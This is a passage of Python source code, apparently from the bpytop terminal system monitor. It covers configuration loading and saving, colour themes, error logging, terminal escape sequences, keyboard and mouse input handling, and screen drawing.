cpu usage should be of the core it's running on or usage of the total available cpu power. proc_per_core=$proc_per_core #* Show process memory as bytes instead of percent proc_mem_bytes=$proc_mem_bytes #* Check cpu temperature, needs "osx-cpu-temp" on MacOS X. check_temp=$check_temp #* Which sensor to use for cpu temperature, use options menu to select from list of available sensors. cpu_sensor=$cpu_sensor #* Show temperatures for cpu cores also if check_temp is True and sensors has been found show_coretemp=$show_coretemp #* Draw a clock at top of screen, formatting according to strftime, empty string to disable. draw_clock="$draw_clock" #* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort. background_update=$background_update #* Custom cpu model name, empty string to disable. custom_cpu_name="$custom_cpu_name" #* Optional filter for shown disks, should be full path of a mountpoint, separate multiple values with a comma ",". #* Begin line with "exclude=" to change to exclude filter, oterwise defaults to "most include" filter. Example: disks_filter="exclude=/boot, /home/user" disks_filter="$disks_filter" #* Show graphs instead of meters for memory values. mem_graphs=$mem_graphs #* If swap memory should be shown in memory box. show_swap=$show_swap #* Show swap as a disk, ignores show_swap value above, inserts itself after first disk. swap_disk=$swap_disk #* If mem box should be split to also show disks info. show_disks=$show_disks #* Set fixed values for network graphs, default "10M" = 10 Mibibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e "100mbit" net_download="$net_download" net_upload="$net_upload" #* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest. net_auto=$net_auto #* Sync the scaling for download and upload to whichever currently has the highest scale net_sync=$net_sync #* If the network graphs color gradient should scale to bandwith usage or auto scale, bandwith usage is based on "net_download" and "net_upload" values net_color_fixed=$net_color_fixed #* Show battery stats in top right if battery is present show_battery=$show_battery #* Show init screen at startup, the init screen is purely cosmetical show_init=$show_init #* Enable check for new version from github.com/aristocratos/bpytop at start. update_check=$update_check #* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG". #* The level set includes all lower levels, i.e. "DEBUG" will show all logging info. log_level=$log_level ''') CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop' if not os.path.isdir(CONFIG_DIR): try: os.makedirs(CONFIG_DIR) os.mkdir(f'{CONFIG_DIR}/themes') except PermissionError: print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!') raise SystemExit(1) CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf' THEME_DIR: str = "" if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'): THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes' else: for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]: if os.path.isdir(f'{td}share/bpytop/themes'): THEME_DIR = f'{td}share/bpytop/themes' break USER_THEME_DIR: str = f'{CONFIG_DIR}/themes' CORES: int = psutil.cpu_count(logical=False) or 1 THREADS: int = psutil.cpu_count(logical=True) or 1 THREAD_ERROR: int = 0 DEFAULT_THEME: Dict[str, str] = { "main_bg" : "", "main_fg" : "#cc", "title" : "#ee", "hi_fg" : "#969696", "selected_bg" : "#7e2626", "selected_fg" : "#ee", "inactive_fg" : "#40", "graph_text" : "#60", "meter_bg" : "#40", "proc_misc" : "#0de756", "cpu_box" : "#3d7b46", "mem_box" : "#8a882e", "net_box" : "#423ba5", "proc_box" : "#923535", "div_line" : "#30", "temp_start" : "#4897d4", "temp_mid" : "#5474e8", "temp_end" : "#ff40b6", "cpu_start" : "#50f095", "cpu_mid" : "#f2e266", "cpu_end" : "#fa1e1e", "free_start" : "#223014", "free_mid" : "#b5e685", "free_end" : "#dcff85", "cached_start" : "#0b1a29", "cached_mid" : "#74e6fc", "cached_end" : "#26c5ff", "available_start" : "#292107", "available_mid" : "#ffd77a", "available_end" : "#ffb814", "used_start" : "#3b1f1c", "used_mid" : "#d9626d", "used_end" : "#ff4769", "download_start" : "#231a63", "download_mid" : "#4f43a3", "download_end" : "#b0a9de", "upload_start" : "#510554", "upload_mid" : "#7d4180", "upload_end" : "#dcafde", "process_start" : "#80d0a3", "process_mid" : "#dcd179", "process_end" : "#d45454", } MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = { "options" : { "normal" : ( "┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐", "│ │├─┘ │ ││ ││││└─┐", "└─┘┴ ┴ ┴└─┘┘└┘└─┘"), "selected" : ( "╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗", "║ ║╠═╝ ║ ║║ ║║║║╚═╗", "╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") }, "help" : { "normal" : ( "┬ ┬┌─┐┬ ┌─┐", "├─┤├┤ │ ├─┘", "┴ ┴└─┘┴─┘┴ "), "selected" : ( "╦ ╦╔═╗╦ ╔═╗", "╠═╣║╣ ║ ╠═╝", "╩ ╩╚═╝╩═╝╩ ") }, "quit" : { "normal" : ( "┌─┐ ┬ ┬ ┬┌┬┐", "│─┼┐│ │ │ │ ", "└─┘└└─┘ ┴ ┴ "), "selected" : ( "╔═╗ ╦ ╦ ╦╔╦╗ ", "║═╬╗║ ║ ║ ║ ", "╚═╝╚╚═╝ ╩ ╩ ") } } MENU_COLORS: Dict[str, Tuple[str, ...]] = { "normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"), "selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00") } #? Units for floating_humanizer function UNITS: Dict[str, Tuple[str, ...]] = { "bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"), "byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB") } #? Setup error logger ----------------------------------------------------------------> try: errlog = logging.getLogger("ErrorLogger") errlog.setLevel(logging.DEBUG) eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4) eh.setLevel(logging.DEBUG) eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)")) errlog.addHandler(eh) except PermissionError: print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!') raise SystemExit(1) #? Timers for testing and debugging --------------------------------------------------------------> class TimeIt: timers: Dict[str, float] = {} paused: Dict[str, float] = {} @classmethod def start(cls, name): cls.timers[name] = time() @classmethod def pause(cls, name): if name in cls.timers: cls.paused[name] = time() - cls.timers[name] del cls.timers[name] @classmethod def stop(cls, name): if name in cls.timers: total: float = time() - cls.timers[name] del cls.timers[name] if name in cls.paused: total += cls.paused[name] del cls.paused[name] errlog.debug(f'{name} completed in {total:.6f} seconds') def timeit_decorator(func): def timed(*args, **kw): ts = time() out = func(*args, **kw) errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds') return out return timed #? Set up config class and load config -----------------------------------------------------------> class Config: '''Holds all config variables and functions for loading from and saving to disk''' keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name", "proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap", "swap_disk", "show_disks", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "view_mode", "theme_background", "net_sync", "show_battery", "tree_depth", "cpu_sensor", "show_coretemp"] conf_dict: Dict[str, Union[str, int, bool]] = {} color_theme: str = "Default" theme_background: bool = True update_ms: int = 2000 proc_sorting: str = "cpu lazy" proc_reversed: bool = False proc_tree: bool = False tree_depth: int = 3 proc_colors: bool = True proc_gradient: bool = True proc_per_core: bool = False proc_mem_bytes: bool = True check_temp: bool = True cpu_sensor: str = "Auto" show_coretemp: bool = True draw_clock: str = "%X" background_update: bool = True custom_cpu_name: str = "" disks_filter: str = "" update_check: bool = True mem_graphs: bool = True show_swap: bool = True swap_disk: bool = True show_disks: bool = True net_download: str = "10M" net_upload: str = "10M" net_color_fixed: bool = False net_auto: bool = True net_sync: bool = False show_battery: bool = True show_init: bool = True view_mode: str = "full" log_level: str = "WARNING" warnings: List[str] = [] info: List[str] = [] sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"] log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"] view_modes: List[str] = ["full", "proc", "stat"] cpu_sensors: List[str] = [ "Auto" ] if hasattr(psutil, "sensors_temperatures"): try: _temps = psutil.sensors_temperatures() if _temps: for _name, _entries in _temps.items(): for _num, _entry in enumerate(_entries, 1): if hasattr(_entry, "current"): cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}') except: pass changed: bool = False recreate: bool = False config_file: str = "" _initialized: bool = False def __init__(self, path: str): self.config_file = path conf: Dict[str, Union[str, int, bool]] = self.load_config() if not "version" in conf.keys(): self.recreate = True self.info.append(f'Config file malformatted or missing, will be recreated on exit!') elif conf["version"] != VERSION: self.recreate = True self.info.append(f'Config file version and bpytop version missmatch, will be recreated on exit!') for key in self.keys: if key in conf.keys() and conf[key] != "_error_": setattr(self, key, conf[key]) else: self.recreate = True self.conf_dict[key] = getattr(self, key) self._initialized = True def __setattr__(self, name, value): if self._initialized: object.__setattr__(self, "changed", True) object.__setattr__(self, name, value) if name not in ["_initialized", "recreate", "changed"]: self.conf_dict[name] = value def load_config(self) -> Dict[str, Union[str, int, bool]]: '''Load config from file, set correct types for values and return a dict''' new_config: Dict[str,Union[str, int, bool]] = {} conf_file: str = "" if os.path.isfile(self.config_file): conf_file = self.config_file elif os.path.isfile("/etc/bpytop.conf"): conf_file = "/etc/bpytop.conf" else: return new_config try: with open(conf_file, "r") as f: for line in f: line = line.strip() if line.startswith("#? Config"): new_config["version"] = line[line.find("v. ") + 3:] for key in self.keys: if line.startswith(key): line = line.replace(key + "=", "") if line.startswith('"'): line = line.strip('"') if type(getattr(self, key)) == int: try: new_config[key] = int(line) except ValueError: self.warnings.append(f'Config key "{key}" should be an integer!') if type(getattr(self, key)) == bool: try: new_config[key] = bool(strtobool(line)) except ValueError: self.warnings.append(f'Config key "{key}" can only be True or False!') if type(getattr(self, key)) == str: new_config[key] = str(line) except Exception as e: errlog.exception(str(e)) if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options: new_config["proc_sorting"] = "_error_" self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!') if "log_level" in new_config and not new_config["log_level"] in self.log_levels: new_config["log_level"] = "_error_" self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!') if "view_mode" in new_config and not new_config["view_mode"] in self.view_modes: new_config["view_mode"] = "_error_" self.warnings.append(f'Config key "view_mode" didn\'t get an acceptable value!') if isinstance(new_config["update_ms"], int) and new_config["update_ms"] < 100: new_config["update_ms"] = 100 self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!') for net_name in ["net_download", "net_upload"]: if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore new_config[net_name] = "_error_" if "cpu_sensor" in new_config and not new_config["cpu_sensor"] in self.cpu_sensors: new_config["cpu_sensor"] = "_error_" self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!') return new_config def save_config(self): '''Save current config to config file if difference in values or version, creates a new file if not found''' if not self.changed and not self.recreate: return try: with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f: f.write(DEFAULT_CONF.substitute(self.conf_dict)) except Exception as e: errlog.exception(str(e)) try: CONFIG: Config = Config(CONFIG_FILE) if DEBUG: errlog.setLevel(logging.DEBUG) else: errlog.setLevel(getattr(logging, CONFIG.log_level)) DEBUG = CONFIG.log_level == "DEBUG" errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}') errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}') errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}') errlog.debug(f'CMD: {" ".join(sys.argv)}') if CONFIG.info: for info in CONFIG.info: errlog.info(info) CONFIG.info = [] if CONFIG.warnings: for warning in CONFIG.warnings: errlog.warning(warning) CONFIG.warnings = [] except Exception as e: errlog.exception(f'{e}') raise SystemExit(1) if not os.path.isdir("/sys/class/power_supply"): CONFIG.show_battery = False if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7): warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!' print("WARNING!", warn) errlog.warning(warn) #? Classes ---------------------------------------------------------------------------------------> class Term: """Terminal info and commands""" width: int = 0 height: int = 0 resized: bool = False _w : int = 0 _h : int = 0 fg: str = "" #* Default foreground color bg: str = "" #* Default background color hide_cursor = "\033[?25l" #* Hide terminal cursor show_cursor = "\033[?25h" #* Show terminal cursor alt_screen = "\033[?1049h" #* Switch to alternate screen normal_screen = "\033[?1049l" #* Switch to normal screen clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0 mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release mouse_off = "\033[?1002l" #* Disable mouse reporting mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting winch = threading.Event() @classmethod def refresh(cls, *args, force: bool = False): """Update width, height and set resized flag if terminal has been resized""" if cls.resized: cls.winch.set(); return cls._w, cls._h = os.get_terminal_size() if (cls._w, cls._h) == (cls.width, cls.height) and not force: return if force: Collector.collect_interrupt = True while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < 80 or cls._h < 24): if Init.running: Init.resized = True CpuBox.clock_block = True cls.resized = True Collector.collect_interrupt = True cls.width, cls.height = cls._w, cls._h Draw.now(Term.clear) Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}', f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}') if cls._w < 80 or cls._h < 24: while cls._w < 80 or cls._h < 24: Draw.now(Term.clear) Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 4, "warning", line_color=Colors.red, title_color=Colors.white)}', f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < 80 else Colors.green}{cls._w} ', f'{Colors.default}Height: {Colors.red if cls._h < 24 else Colors.green}{cls._h}{Term.bg}{Term.fg}', f'{Mv.to(cls._h // 2, cls._w // 2 - 23)}{Colors.default}{Colors.black_bg}Width and Height needs to be at least 80 x 24 !{Fx.ub}{Term.bg}{Term.fg}') cls.winch.wait(0.3) cls.winch.clear() cls._w, cls._h = os.get_terminal_size() else: cls.winch.wait(0.3) cls.winch.clear() cls._w, cls._h = os.get_terminal_size() Key.mouse = {} Box.calc_sizes() if Init.running: cls.resized = False; return if Menu.active: Menu.resized = True Box.draw_bg(now=False) cls.resized = False Timer.finish() @staticmethod def echo(on: bool): """Toggle input echo""" (iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno()) if on: lflag |= termios.ECHO # type: ignore else: lflag &= ~termios.ECHO # type: ignore new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc] termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr) @staticmethod def title(text: str = "") -> str: out: str = f'{os.environ.get("TERMINAL_TITLE", "")}' if out and text: out += " " if text: out += f'{text}' return f'\033]0;{out}\a' class Fx: """Text effects * trans(string: str): Replace whitespace with escape move right to not overwrite background behind whitespace. * uncolor(string: str) : Removes all 24-bit color and returns string .""" start = "\033[" #* Escape sequence start sep = ";" #* Escape sequence separator end = "m" #* Escape sequence end reset = rs = "\033[0m" #* Reset foreground/background color and text effects bold = b = "\033[1m" #* Bold on unbold = ub = "\033[22m" #* Bold off dark = d = "\033[2m" #* Dark on undark = ud = "\033[22m" #* Dark off italic = i = "\033[3m" #* Italic on unitalic = ui = "\033[23m" #* Italic off underline = u = "\033[4m" #* Underline on ununderline = uu = "\033[24m" #* Underline off blink = bl = "\033[5m" #* Blink on unblink = ubl = "\033[25m" #* Blink off strike = s = "\033[9m" #* Strike / crossed-out on unstrike = us = "\033[29m" #* Strike / crossed-out off #* Precompiled regex for finding a 24-bit color escape sequence in a string color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m") @staticmethod def trans(string: str): return string.replace(" ", "\033[1C") @classmethod def uncolor(cls, string: str) -> str: return f'{cls.color_re.sub("", string)}' class Raw(object): """Set raw input mode for device""" def __init__(self, stream): self.stream = stream self.fd = self.stream.fileno() def __enter__(self): self.original_stty = termios.tcgetattr(self.stream) tty.setcbreak(self.stream) def __exit__(self, type, value, traceback): termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty) class Nonblocking(object): """Set nonblocking mode for device""" def __init__(self, stream): self.stream = stream self.fd = self.stream.fileno() def __enter__(self): self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL) fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK) def __exit__(self, *args): fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl) class Mv: """Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()""" @staticmethod def to(line: int, col: int) -> str: return f'\033[{line};{col}f' #* Move cursor to line, column @staticmethod def right(x: int) -> str: #* Move cursor right x columns return f'\033[{x}C' @staticmethod def left(x: int) -> str: #* Move cursor left x columns return f'\033[{x}D' @staticmethod def up(x: int) -> str: #* Move cursor up x lines return f'\033[{x}A' @staticmethod def down(x: int) -> str: #* Move cursor down x lines return f'\033[{x}B' save: str = "\033[s" #* Save cursor position restore: str = "\033[u" #* Restore saved cursor postion t = to r = right l = left u = up d = down class Key: """Handles the threaded input reader for keypresses and mouse events""" list: List[str] = [] mouse: Dict[str, List[List[int]]] = {} mouse_pos: Tuple[int, int] = (0, 0) escape: Dict[Union[str, Tuple[str, str]], str] = { "\n" : "enter", ("\x7f", "\x08") : "backspace", ("[A", "OA") : "up", ("[B", "OB") : "down", ("[D", "OD") : "left", ("[C", "OC") : "right", "[2~" : "insert", "[3~" : "delete", "[H" : "home", "[F" : "end", "[5~" : "page_up", "[6~" : "page_down", "\t" : "tab", "[Z" : "shift_tab", "OP" : "f1", "OQ" : "f2", "OR" : "f3", "OS" : "f4", "[15" : "f5", "[17" : "f6", "[18" : "f7", "[19" : "f8", "[20" : "f9", "[21" : "f10", "[23" : "f11", "[24" : "f12" } new = threading.Event() idle = threading.Event() mouse_move = threading.Event() mouse_report: bool = False idle.set() stopping: bool = False started: bool = False reader: threading.Thread @classmethod def start(cls): cls.stopping = False cls.reader = threading.Thread(target=cls._get_key) cls.reader.start() cls.started = True @classmethod def stop(cls): if cls.started and cls.reader.is_alive(): cls.stopping = True try: cls.reader.join() except: pass @classmethod def last(cls) -> str: if cls.list: return cls.list.pop() else: return "" @classmethod def get(cls) -> str: if cls.list: return cls.list.pop(0) else: return "" @classmethod def get_mouse(cls) -> Tuple[int, int]: if cls.new.is_set(): cls.new.clear() return cls.mouse_pos @classmethod def mouse_moved(cls) -> bool: if cls.mouse_move.is_set(): cls.mouse_move.clear() return True else: return False @classmethod def has_key(cls) -> bool: return bool(cls.list) @classmethod def clear(cls): cls.list = [] @classmethod def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool: '''Returns True if key is detected else waits out timer and returns False''' if cls.list: return True if mouse: Draw.now(Term.mouse_direct_on) cls.new.wait(sec if sec > 0 else 0.0) if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on) if cls.new.is_set(): cls.new.clear() return True else: return False @classmethod def break_wait(cls): cls.list.append("_null") cls.new.set() sleep(0.01) cls.new.clear() @classmethod def _get_key(cls): """Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread.""" input_key: str = "" clean_key: str = "" try: while not cls.stopping: with Raw(sys.stdin): if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag continue input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on if input_key == "\033": #* If first character is a escape sequence keep reading cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting a IO Block error Draw.idle.wait() #* Wait for Draw function to finish if busy with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall input_key += sys.stdin.read(20) if input_key.startswith("\033[<"): _ = sys.stdin.read(1000) cls.idle.set() #* Report IO blocking done #errlog.debug(f'{repr(input_key)}') if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033 elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event try: cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM"))) except: pass else: if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode cls.mouse_move.set() cls.new.set() elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up clean_key = "mouse_scroll_up" elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down clean_key = "mouse_scroll_down" elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release if Menu.active: clean_key = "mouse_click" else: for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable if list(cls.mouse_pos) in positions: clean_key = key_name break else: clean_key = "mouse_click" elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped else: for code in cls.escape.keys(): #* Go trough dict of escape codes to get the cleaned key name if input_key.lstrip("\033").startswith(code): clean_key = cls.escape[code] break else: #* If not found in escape dict and length of key is 1, assume regular character if len(input_key) == 1: clean_key = input_key if clean_key: cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing if len(cls.list) > 10: del cls.list[0] clean_key = "" cls.new.set() #* Set threading event to interrupt main thread sleep input_key = "" except Exception as e: errlog.exception(f'Input thread failed with exception: {e}') cls.idle.set() cls.list.clear() clean_quit(1, thread=True) class Draw: '''Holds the draw buffer and manages IO blocking queue * .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer * - Adding "+" prefix to name sets append to True and appends to name's current string * - Adding "!" suffix to name sets now to True and print name's current string * .out(clear=False) : Print all strings in buffer, clear=True clear all buffers after * .now(*args) : Prints all arguments as a string * .clear(*names) : Clear named buffers, all if no argument * .last_screen() : Prints all saved buffers ''' strings: Dict[str, str] = {} z_order: Dict[str, int] = {} saved: Dict[str, str] = {} save: Dict[str, bool] = {} once: Dict[str, bool] = {} idle = threading.Event() idle.set() @classmethod def now(cls, *args): '''Wait for input reader and self to be idle then print to screen''' Key.idle.wait() cls.idle.wait() cls.idle.clear() try: print(*args, sep="", end="", flush=True) except BlockingIOError: pass Key.idle.wait() print(*args, sep="", end="", flush=True) cls.idle.set() @classmethod def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False): string: str = "" if name.startswith("+"): name = name.lstrip("+") append = True if name.endswith("!"): name = name.rstrip("!") now = True cls.save[name] = not no_save cls.once[name] = once if not name in cls.z_order or z != 100: cls.z_order[name] = z if args: string = "".join(args) if only_save: if name not in cls.saved or not append: cls.saved[name] = "" cls.saved[name] += string else: if name not in cls.strings or not append: cls.strings[name] = "" cls.strings[name] += string if now: cls.out(name) @classmethod def out(cls, *names: str, clear = False): out: str = "" if not cls.strings: return if names: for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore if name in names and name in cls.strings: out += cls.strings[name] if cls.save[name]: cls.saved[name] = cls.strings[name] if clear or cls.once[name]: cls.clear(name) cls.now(out) else: for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore if name in cls.strings: out += cls.strings[name] if cls.save[name]: cls.saved[name] = cls.strings[name] if cls.once[name] and not clear: cls.clear(name) if clear: cls.clear() cls.now(out) @classmethod def saved_buffer(cls) -> str: out: str = "" for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore if name in cls.saved: out += cls.saved[name] return out @classmethod def clear(cls, *names, saved: bool = False): if names: for name in names: if name in cls.strings: del cls.strings[name] if name in cls.save: del cls.save[name] if name in cls.once: del cls.once[name] if saved: if name in cls.saved: del cls.saved[name] if name in cls.z_order: del cls.z_order[name] else: cls.strings = {} cls.save = {} cls.once = {} if saved: cls.saved = {} cls.z_order = {} class Color: '''Holds representations for a 24-bit color value __init__(color, depth="fg", default=False) -- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string. -- depth accepts "fg" or "bg" __call__(*args) joins str arguments to a string and apply color __str__ returns escape sequence to set color __iter__ returns iteration over red, green and blue in integer values of 0-255. * Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str ''' hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool def __init__(self, color: str, depth: str = "fg", default: bool = False): self.depth = depth self.default = default try: if not color: self.dec = (-1, -1, -1) self.hexa = "" self.red = self.green = self.blue = -1 self.escape = "\033[49m" if depth == "bg" and default else "" return elif color.startswith("#"): self.hexa = color if len(self.hexa) == 3: self.hexa += self.hexa[1:3] + self.hexa[1:3] c = int(self.hexa[1:3], base=16) self.dec = (c, c, c) elif len(self.hexa) == 7: self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16)) else: raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}') else: c_t = tuple(map(int, color.split(" "))) if len(c_t) == 3: self.dec = c_t #type: ignore else: raise ValueError(f'RGB dec should be "0-255 0-255 0-255"') ct = self.dec[0] + self.dec[1] + self.dec[2] if ct > 255*3 or ct < 0: raise ValueError(f'RGB values out of range: {color}') except Exception as e: errlog.exception(str(e)) self.escape = "" return if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}' if self.dec and self.hexa: self.red, self.green, self.blue = self.dec self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m' def __str__(self) -> str: return self.escape def __repr__(self) -> str: return repr(self.escape) def __iter__(self) -> Iterable: for c in self.dec: yield c def __call__(self, *args: str) -> str: if len(args) < 1: return "" return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}' @staticmethod def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str: """Returns escape sequence to set color * accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF" * or decimal RGB: r=0-255, g=0-255, b=0-255 * depth="fg" or "bg" """ dint: int = 38 if depth == "fg" else 48 color: str = "" if hexa: try: if len(hexa) == 3: c = int(hexa[1:], base=16) color = f'\033[{dint};2;{c};{c};{c}m' elif len(hexa) == 7: color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m' except ValueError as e: errlog.exception(f'{e}') else: color = f'\033[{dint};2;{r};{g};{b}m' return color @classmethod def fg(cls, *args) -> str: if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg") else: return cls.escape_color(hexa=args[0], depth="fg") @classmethod def bg(cls, *args) -> str: if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg") else: return cls.escape_color(hexa=args[0], depth="bg") class Colors: '''Standard colors for menus and dialogs''' default = Color("#cc") white = Color("#ff") red = Color("#bf3636") green = Color("#68bf36") blue = Color("#0fd7ff") yellow = Color("#db8b00") black_bg = Color("#00", depth="bg") null = Color("") class Theme: '''__init__ accepts a dict containing { "color_element" : "color" }''' themes: Dict[str, str] = {} cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME } current: str = "" main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default gradient: Dict[str, List[str]] = { "temp" : [], "cpu" : [], "free" : [], "cached" : [], "available" : [], "used" : [], "download" : [], "upload" : [], "proc" : [], "proc_color" : [], "process" : [], } def __init__(self, theme: str): self.refresh() self._load_theme(theme) def __call__(self, theme: str): for k in self.gradient.keys(): self.gradient[k] = [] self._load_theme(theme) def _load_theme(self, theme: str): tdict: Dict[str, str] if theme in self.cached: tdict = self.cached[theme] elif theme in self.themes: tdict = self._load_file(self.themes[theme]) self.cached[theme] = tdict else: errlog.warning(f'No theme named "{theme}" found!') theme = "Default" CONFIG.color_theme = theme tdict = DEFAULT_THEME self.current = theme #if CONFIG.color_theme != theme: CONFIG.color_theme = theme if not "graph_text" in tdict and "inactive_fg" in tdict: tdict["graph_text"] = tdict["inactive_fg"] if not "meter_bg" in tdict and "inactive_fg" in tdict: tdict["meter_bg"] = tdict["inactive_fg"] if not "process_start" in tdict and "cpu_start" in tdict: tdict["process_start"] = tdict["cpu_start"] tdict["process_mid"] = tdict.get("cpu_mid", "") tdict["process_end"] = tdict.get("cpu_end", "") #* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict for item, value in DEFAULT_THEME.items(): default = item in ["main_fg", "main_bg"] depth = "bg" if item in ["main_bg", "selected_bg"] else "fg" if item in tdict: setattr(self, item, Color(tdict[item], depth=depth, default=default)) else: setattr(self, item, Color(value, 